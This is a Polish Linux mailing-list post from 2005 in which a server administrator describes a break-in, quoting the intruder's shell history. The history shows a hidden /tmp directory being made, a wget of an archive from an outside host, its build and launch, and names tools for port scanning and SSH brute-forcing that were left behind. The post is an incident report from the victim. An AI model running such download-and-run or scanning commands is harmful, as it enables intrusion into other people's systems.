W Twoim liście datowanym 17 lutego 2005 (00:28:25) można przeczytać:
LSKJ> Paweł Nawrocki napisał(a): >> bez zadnych bledow, >> chwile pozniej weryfikacja >> [EMAIL PROTECTED]:/var/cache/poldek]#rpm -V coreutils LSKJ> rzeczywiście - dziwaczne. LSKJ> A wiesz jak miałeś ten włam? Co zrobił włamywacz? ktoregos razu przegladalem strony na moim serwerze, ale jakos dziwnie wolno dzialaly. uruchomilem top, i okazalo sie, ze 95% czasu procesora zuzywa jakis dziwny proces, ktory nazywa sie pscan2. ps aux pokazalo, ze ten proces uruchomil jeden z uzytkownikow. to co potrafie zrobic ogranicza sie do przejrzenia historii uzytych komend z pliku .history dokladny wyciag wyglada tak: w passwd cd /tmp mkdir .sen";" cd .sen";" mkdir .sen cd .sen wget muistule.home.ro/root/mech.tgz tar xvzf mech.tgz cd ls cd ls ./configure make clean install rm -rf mech.set vi mech.set mv mech init sh to wszystko. wiem, ze ten uzytkownik uruchomil jeszcze sshf2. w tym katalogu .sen sa jeszcze takie programy jak 213 assh auto go.sh psscan2 ss sshf sshf2 pozdrawiam, pawel nawrocki _______________________________________________ pld-users-pl mailing list pld-users-pl@pld-linux.org http://lists.pld-linux.org/mailman/listinfo/pld-users-pl
